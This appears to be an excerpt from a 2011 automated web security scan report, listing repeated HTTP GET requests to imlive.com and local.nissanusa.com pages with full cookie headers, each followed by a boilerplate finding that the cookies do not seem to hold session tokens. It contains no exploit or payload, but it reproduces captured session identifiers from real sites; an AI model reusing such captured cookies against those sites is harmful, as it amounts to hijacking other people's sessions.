GET /webcam-advanced-search/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:56 GMT Connection: close Content-Length: 74384 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-faq/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-sign-up/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /albany-schenectady-troy-ny-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /albuquerque-santa-fe-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /atlanta-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /austin-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /baltimore-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /boston-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /chicago-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cincinnati-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cleveland-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /columbus-oh-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dallas-ft-worth-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /denver-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /harlingen-brownsville-tx-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /harrisburg-lancaster-pa-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hartford-new-haven-ct-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /honolulu-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /houston-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /indianapolis-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jacksonville-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /las-vegas-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /little-rock-pine-bluff-ar-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /los-angeles-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /louisville-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
